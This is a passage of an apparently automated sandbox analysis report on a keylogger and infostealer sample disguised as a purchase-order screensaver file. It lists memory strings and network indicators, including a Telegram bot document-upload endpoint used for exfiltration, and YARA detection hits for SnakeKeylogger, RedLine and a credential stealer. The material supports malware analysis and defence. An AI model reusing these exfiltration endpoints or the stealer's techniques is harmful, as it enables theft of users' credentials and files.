                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002691000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/X
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr String found in binary or memory: http://checkip.dyndns.org/q
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgX
                  Source: Microsofts.exe, 0000000E.00000002.645305305.0000000005730000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: Microsofts.exe, 0000000E.00000002.645305305.0000000005730000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
                  Source: Microsofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
                  Source: Microsofts.exe, 0000000E.00000002.643206935.000000000272D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgX
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://s.symcd.com06
                  Source: armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: armsvc.exe, 0000000B.00000003.493747388.0000000001C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: PO#_1100015533.scr, 00000000.00000002.386365175.0000000002931000.00000004.00000800.00020000.00000000.sdmp, hVVSnrrP.exe, 0000000A.00000002.577498436.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.401578021.0000000002141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OW
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640Cb
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccep
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww7.przvgke.biz/
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0.
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                  Source: powershell.exe, 00000010.00000002.403165134.0000000003169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=fwiwk.biz
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: Microsofts.exe, 0000000E.00000002.640161168.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189X
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
                  Source: armsvc.exe, 0000000B.00000003.599139658.0000000001E40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://trkpcna.net/track.
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
                  Source: armsvc.exe, 0000000B.00000003.602188957.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.393870874.0000000002470000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.391699512.0000000001F00000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.393845500.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000002.639468285.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.392632097.00000000023E0000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443

                  System Summary

                  Source: 00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File dump: apihost.exe.12.dr 665670656
                  Source: initial sample Static PE information: Filename: PO#_1100015533.scr
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\perfhost.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\68573a154f49b6de.bin
                  Source: C:\Windows\System32\msdtc.exe File created: C:\Windows\DtcInstall.log
                  Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Microsofts.exe DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
                  Source: ehrecvr.exe.11.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: elevation_service.exe.11.dr Static PE information: Number of sections : 12 > 10
                  Source: PO#_1100015533.scr, 00000000.00000002.418062548.000000000A6EA000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.380436559.000000000089B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000000.355411706.0000000000F1A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebcYK.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.402396004.0000000003553000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.402396004.00000000044EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.380436559.00000000007D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000000.00000002.379886354.0000000000790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename_.dll4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.387118499.00000000008C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclrjit.dllT vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: p,\\StringFileInfo\\040904B0\\OriginalFilename vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393889699.0000000003009000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.exe* vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.380427536.000000000045A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO#_1100015533.scr
                  Source: PO#_1100015533.scrBinary or memory string: OriginalFilenamebcYK.exe< vs PO#_1100015533.scr
                  Source: PO#_1100015533.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: PO#_1100015533.scr PID: 3632, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Microsofts.exe PID: 3800, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: FlashPlayerUpdateService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SearchIndexer.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aspnet_state.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: mscorsvw.exe1.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: mscorsvw.exe2.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: dllhost.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ehrecvr.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ehsched.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ieetwcollector.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
